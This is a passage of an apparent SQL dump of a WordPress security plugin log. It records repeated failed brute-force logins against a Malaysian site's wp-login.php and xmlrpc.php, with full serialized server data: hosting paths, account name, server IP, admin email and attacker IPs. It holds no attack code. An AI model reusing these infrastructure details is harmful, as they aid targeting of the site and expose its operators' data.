15:03:29',17741584,19233152,'https://bintara.com.my/wp-login.php',1,0,'177.36.8.226'),(25089,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"192.95.30.27\";s:11:\"REMOTE_PORT\";s:5:\"42962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJFfTYpjlmVadK6PeG2BwAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568818557.8127\";s:12:\"REQUEST_TIME\";s:10:\"1568818557\";}}','notice','2019-09-18 14:55:59','2019-09-18 14:55:58',18258136,19557336,'https://bintara.com.my/xmlrpc.php',1,0,'192.95.30.27'),(25088,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"192.95.30.27\";s:11:\"REMOTE_PORT\";s:5:\"41710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJFejYpjlmVadK6PeG2BgAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568818554.752\";s:12:\"REQUEST_TIME\";s:10:\"1568818554\";}}','notice','2019-09-18 14:55:56','2019-09-18 14:55:55',17741680,19233152,'https://bintara.com.my/wp-login.php',1,0,'192.95.30.27'),(25087,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"44090\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJD9iR0vdvYEIduPCL4DgAAAQo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568818166.4822\";s:12:\"REQUEST_TIME\";s:10:\"1568818166\";}}','notice','2019-09-18 14:49:27','2019-09-18 14:49:26',18258104,19553072,'https://bintara.com.my/xmlrpc.php',1,0,'149.56.38.19'),(25086,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"43474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJD8srWzCkhZpjT3iOw9QAAAUQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568818162.791\";s:12:\"REQUEST_TIME\";s:10:\"1568818162\";}}','notice','2019-09-18 14:49:24','2019-09-18 14:49:23',17741360,19233320,'https://bintara.com.my/wp-login.php',1,0,'149.56.38.19'),(25085,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"34072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJCGsrWzCkhZpjT3iOu@gAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568817690.0899\";s:12:\"REQUEST_TIME\";s:10:\"1568817690\";}}','notice','2019-09-18 14:41:31','2019-09-18 14:41:30',18258256,19556672,'https://bintara.com.my/xmlrpc.php',1,0,'123.51.152.53'),(25084,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"33526\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJCF8rWzCkhZpjT3iOu9gAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568817687.5211\";s:12:\"REQUEST_TIME\";s:10:\"1568817687\";}}','notice','2019-09-18 14:41:28','2019-09-18 14:41:27',17740800,19231952,'https://bintara.com.my/wp-login.php',1,0,'123.51.152.53'),(25083,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.37.180\";s:11:\"REMOTE_PORT\";s:5:\"54162\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJAq1lvzIDnRn6zOHUIkAAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568817323.2771\";s:12:\"REQUEST_TIME\";s:10:\"1568817323\";}}','notice','2019-09-18 14:35:25','2019-09-18 14:35:23',18257840,19557312,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.37.180'),(25082,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.37.180\";s:11:\"REMOTE_PORT\";s:5:\"52846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJAojYpjlmVadK6PeG0NwAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568817314.704\";s:12:\"REQUEST_TIME\";s:10:\"1568817314\";}}','notice','2019-09-18 14:35:16','2019-09-18 14:35:15',17741232,19231568,'https://bintara.com.my/wp-login.php',1,0,'142.93.37.180'),(25081,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"36812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI8rCR0vdvYEIduPCL2sQAAAQU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568816300.1729\";s:12:\"REQUEST_TIME\";s:10:\"1568816300\";}}','notice','2019-09-18 14:18:21','2019-09-18 